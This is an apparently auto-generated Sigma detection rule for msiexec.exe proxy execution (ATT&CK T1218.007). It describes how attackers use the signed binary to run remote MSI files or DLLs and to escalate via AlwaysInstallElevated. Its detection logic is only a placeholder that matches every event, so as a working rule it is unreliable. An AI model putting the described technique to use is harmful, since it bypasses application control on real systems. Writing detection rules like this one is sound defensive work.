title: Msiexec (T1218.007)
id: df00tech-t1218-007
status: experimental
description: "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is commonly associated with executing installation packages (.msi). Since it is a signed Microsoft binary, msiexec.exe can bypass application control solutions. Adversaries use it to launch local or remote MSI files and to execute DLLs. Execution may also be elevated to SYSTEM if the AlwaysInstallElevated policy is enabled. Widely abused by malware families including QakBot, IcedID, Emotet, Clop, Maze, Ragnar Locker, Latrodectus, Raspberry Robin, TA505, Rancor, ZIRCONIUM, and many others."
references:
  - https://attack.mitre.org/techniques/T1218/007/
  - https://df00tech.com/detections/T1218.007
author: df00tech
date: 2026/04/13
tags:
  - attack.t1218.007
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "Legitimate software deployment via SCCM, Intune, or PDQ Deploy which frequently calls msiexec.exe with /quiet or /passive flags"
  - System updates and Windows Update installation processes that use msiexec.exe with silent flags
  - IT administrators manually installing software packages with administrative flags
  - Software auto-update mechanisms that download and install MSI packages remotely
level: high